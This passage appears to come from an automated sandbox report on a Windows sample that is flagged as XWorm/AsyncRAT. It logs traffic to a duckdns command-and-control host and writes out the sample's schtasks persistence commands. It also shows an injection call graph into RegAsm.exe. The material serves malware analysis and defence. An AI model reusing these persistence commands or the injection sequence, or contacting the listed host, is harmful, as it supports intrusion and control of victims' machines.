                                        Apr 21, 2024 23:24:56.646600008 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:56.847608089 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:56.849386930 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:57.087912083 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:02.396760941 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:02.595947981 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:02.600737095 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:02.837860107 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:05.271725893 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:05.470650911 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:05.472330093 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:05.712244034 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:13.858192921 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:13.912187099 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:14.959889889 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:15.159610033 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:15.162328005 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:15.400275946 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:25.646917105 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:25.845801115 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:25.850166082 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:26.086821079 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:28.834573984 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:29.033370018 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:29.034898996 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:29.273413897 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:30.256372929 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:30.483460903 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:30.485003948 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:30.723738909 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:36.100123882 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:36.298695087 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:36.300127983 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:36.537247896 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:43.533736944 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:43.584323883 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:46.790811062 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:46.988955975 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:46.991215944 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:47.228734970 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:57.240961075 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:57.439332962 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:25:57.441339016 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:25:57.679769993 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:01.631776094 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:01.829998970 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:01.830071926 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.027967930 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.028460026 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.225863934 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.228419065 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.425661087 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.425832033 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.668462992 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:02.668620110 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:02.906622887 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:08.084995985 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:08.283586025 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:08.285370111 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:08.524384975 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:13.747680902 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:13.912720919 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:14.047055006 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:14.047133923 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:18.772455931 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:18.971230030 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:18.974659920 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:19.213866949 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:23.475698948 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:23.679619074 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:23.728462934 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:23.853245020 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:24.091512918 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:26.163173914 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:26.400296926 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:26.421097040 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:26.422986984 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:26.661381006 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:28.241239071 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:28.443537951 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:28.445575953 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:28.682708979 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:30.725956917 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:30.923717022 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:30.923799038 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:31.121428013 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:31.126522064 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:31.364308119 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:31.366918087 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:31.607069969 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.241244078 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:33.439599037 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.441183090 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:33.678348064 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.678469896 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:33.877882957 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:33.882816076 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:34.120840073 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:36.226013899 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:36.426326990 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:36.431091070 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:36.668994904 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:43.756947994 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:43.803817034 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:46.616436958 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:46.814907074 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:46.816431999 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:47.053190947 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:49.492536068 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:49.729532957 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:49.770524025 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:49.772306919 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:50.013292074 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:50.538310051 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:50.760000944 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:50.761746883 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:50.999877930 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:56.944940090 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:57.183329105 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:57.754271984 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:26:57.756340981 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:26:57.994399071 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:27:02.476038933 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:27:02.685039043 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:27:02.686117887 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:27:02.928292036 CEST88964973057.128.155.22192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 21, 2024 23:23:03.227469921 CEST4922753192.168.2.41.1.1.1
                                        Apr 21, 2024 23:23:03.366585016 CEST53492271.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Apr 21, 2024 23:23:03.227469921 CEST192.168.2.41.1.1.10xe624Standard query (0)vbdsg.duckdns.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Apr 21, 2024 23:23:03.366585016 CEST1.1.1.1192.168.2.40xe624No error (0)vbdsg.duckdns.org57.128.155.22A (IP address)IN (0x0001)false

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Users\user\Desktop\fresh_shrunk.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\fresh_shrunk.exe"
                                        Imagebase:0x5b0000
                                        File size:167'936 bytes
                                        MD5 hash:745A24A4347A0BB2B9C5E1BA5B2DADEB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0x9d0000
                                        File size:65'440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:2
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0xc70000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:23:22:55
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:23:22:55
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
                                        Imagebase:0xb20000
                                        File size:167'936 bytes
                                        MD5 hash:745A24A4347A0BB2B9C5E1BA5B2DADEB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 55%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0xcd0000
                                        File size:65'440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0xc70000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
                                        Imagebase:0x7ff7699e0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:16.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:4.7%
                                          Total number of Nodes:64
                                          Total number of Limit Nodes:4
                                          execution_graph 5078 2710848 5079 271084c 5078->5079 5080 2710852 5079->5080 5082 2712211 5079->5082 5086 27163c0 5082->5086 5091 27163b3 5082->5091 5083 2712222 5083->5080 5088 27163cc 5086->5088 5087 27163d6 5087->5083 5088->5087 5096 2717ef7 5088->5096 5106 271796a 5088->5106 5092 27163c0 5091->5092 5093 27163d6 5092->5093 5094 2717ef7 4 API calls 5092->5094 5095 271796a 14 API calls 5092->5095 5093->5083 5094->5092 5095->5092 5097 2717f03 5096->5097 5098 2717e1d 5096->5098 5099 2717e91 5098->5099 5141 27187c0 5098->5141 5145 27187c8 5098->5145 5099->5088 5100 2717d99 5135 2718890 5100->5135 5138 2718888 5100->5138 5101 2717daf 5101->5088 5107 271797a 5106->5107 5149 2718030 5107->5149 5153 2718025 5107->5153 5108 2717a1c 5115 2717d27 5108->5115 5123 27184c0 ReadProcessMemory 5108->5123 5124 27184c8 ReadProcessMemory 5108->5124 5109 2717d80 5121 2718890 ResumeThread 5109->5121 5122 2718888 ResumeThread 5109->5122 5110 2717daf 5110->5088 5111 2717b01 5127 27185b1 VirtualAllocEx 5111->5127 5128 27185b8 VirtualAllocEx 5111->5128 5112 2717b7d 5112->5115 5133 2718660 WriteProcessMemory 5112->5133 5134 2718658 WriteProcessMemory 5112->5134 5113 2717ce9 5117 2718660 WriteProcessMemory 5113->5117 5118 2718658 WriteProcessMemory 5113->5118 5114 2717bf0 5114->5113 5119 2718660 WriteProcessMemory 5114->5119 5120 2718658 WriteProcessMemory 5114->5120 5116 2717d63 5115->5116 5125 2718400 Wow64GetThreadContext 5115->5125 5126 2718408 Wow64GetThreadContext 5115->5126 5116->5109 5131 27187c0 Wow64SetThreadContext 5116->5131 5132 27187c8 Wow64SetThreadContext 5116->5132 5117->5115 5118->5115 5119->5114 5120->5114 5121->5110 5122->5110 5123->5111 5124->5111 5125->5116 5126->5116 5127->5112 5128->5112 5131->5109 5132->5109 5133->5114 5134->5114 5136 27188d3 ResumeThread 5135->5136 5137 2718901 5136->5137 5137->5101 5139 27188d3 ResumeThread 5138->5139 5140 2718901 5139->5140 5140->5101 5142 2718810 Wow64SetThreadContext 5141->5142 5144 2718851 5142->5144 5144->5100 5146 2718810 Wow64SetThreadContext 5145->5146 5148 2718851 5146->5148 5148->5100 5150 27180c0 CreateProcessAsUserA 5149->5150 5152 271827f 5150->5152 5152->5152 5154 27180c0 CreateProcessAsUserA 5153->5154 5156 271827f 5154->5156 5156->5156

                                          Executed Functions

                                          Function 02718030 Relevance: 1.7, APIs: 1, Instructions: 240processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 227 2718030-27180cc 229 2718105-2718125 227->229 230 27180ce-27180d8 227->230 237 2718127-2718131 229->237 238 271815e-271818a 229->238 230->229 231 27180da-27180dc 230->231 232 27180ff-2718102 231->232 233 27180de-27180e8 231->233 232->229 235 27180ea 233->235 236 27180ec-27180fb 233->236 235->236 236->236 240 27180fd 236->240 237->238 239 2718133-2718135 237->239 246 27181c3-271827d CreateProcessAsUserA 238->246 247 271818c-2718196 238->247 241 2718137-2718141 239->241 242 2718158-271815b 239->242 240->232 244 2718143 241->244 245 2718145-2718154 241->245 242->238 244->245 245->245 248 2718156 245->248 257 2718286-27182fa 246->257 258 271827f-2718285 246->258 247->246 249 2718198-271819a 247->249 248->242 251 27181bd-27181c0 249->251 252 271819c-27181a6 249->252 251->246 253 27181a8 252->253 254 27181aa-27181b9 252->254 253->254 254->254 256 27181bb 254->256 256->251 266 271830a-271830e 257->266 267 27182fc-2718300 257->267 258->257 268 2718310-2718314 266->268 269 271831e-2718322 266->269 267->266 270 2718302-2718305 call 2715f98 267->270 268->269 271 2718316-2718319 call 2715f98 268->271 272 2718332-2718336 269->272 273 2718324-2718328 269->273 270->266 271->269 277 2718348-271834f 272->277 278 2718338-271833e 272->278 273->272 276 271832a-271832d call 2715f98 273->276 276->272 280 2718351-2718360 277->280 281 2718366 277->281 278->277 280->281 282 2718367 281->282 282->282
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0271826A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 8b25330ca10ae9294245170b6e0483f7e0e131f67ee65ce449e6b648161d0179
                                          • Instruction ID: 7f6af540e8e08f4894cf674f8152a2123a16e2c9ebfb01f08db8040dc541601c
                                          • Opcode Fuzzy Hash: 8b25330ca10ae9294245170b6e0483f7e0e131f67ee65ce449e6b648161d0179
                                          • Instruction Fuzzy Hash: C8912971D00619CFEB25DF69C941BEEBBB2FF48304F0481A9E818A7250DB759985CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027150D0 Relevance: .3, Instructions: 281COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58753553344a19c24875972d84a4176f44d579e592e5c377861f174195543ef1
                                          • Instruction ID: 8d60b809a71d5c5a817b95064a0c69573671dd1afda47936fabcef53a0840181
                                          • Opcode Fuzzy Hash: 58753553344a19c24875972d84a4176f44d579e592e5c377861f174195543ef1
                                          • Instruction Fuzzy Hash: 7FB13CB1E00209CFDB19CFADD9857AEBBF2AF88314F548129D815A7294EB749845CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 027159A0 Relevance: .3, Instructions: 266COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23e925da8a5d8b0b6e85f53dbfaa48b41e2912326525aad320418b235b538df1
